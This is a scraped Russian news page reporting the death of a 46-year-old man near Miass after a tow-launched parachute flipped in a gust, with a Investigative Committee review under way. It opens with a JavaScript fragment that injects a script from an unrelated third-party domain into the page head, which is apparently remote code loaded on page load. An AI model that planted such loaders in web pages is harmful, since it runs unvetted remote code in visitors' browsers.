, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

В окрестностях Миасса, упав с 20-метровой высоты, разбился 46-летний любитель экстрима

Трагедия произошла 31 декабря в окрестностях села Устиново. В канун нового года группа жителей Миасса решила провести время в экстремальном стиле – подъемом в воздух на парашюте «летающее крыло». В итоге экстремальные развлечения привели к гибели 46-летнего мужчины, который упал с большой высоты.

Установлено, что друзья погибшего подняли его парашют в воздух при помощи автомобиля. На высоте примерно 20 метров боковой порыв ветра перевернул парашют, и он вместе с мужчиной рухнул вниз. Отметим, что жители Миасса не принадлежали ни к какому спортивному клубу и действовали без инструкторов. Произошедшее было зафиксировано на видеокамеру - экстремалы записывали на память свои полеты.

Сейчас трагические кадры изучают представители Следственного комитета. По факту гибели мужчины начата доследственная проверка. Следователям совместно со специалистами в области парашютного спорта предстоит изучить видеозапись и дать оценку произошедшему.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
14:38 - 10 января 2014
|
автор: U-RSS
|
(457)
|
(0)

Комментарии (0)

Я человек
Я бот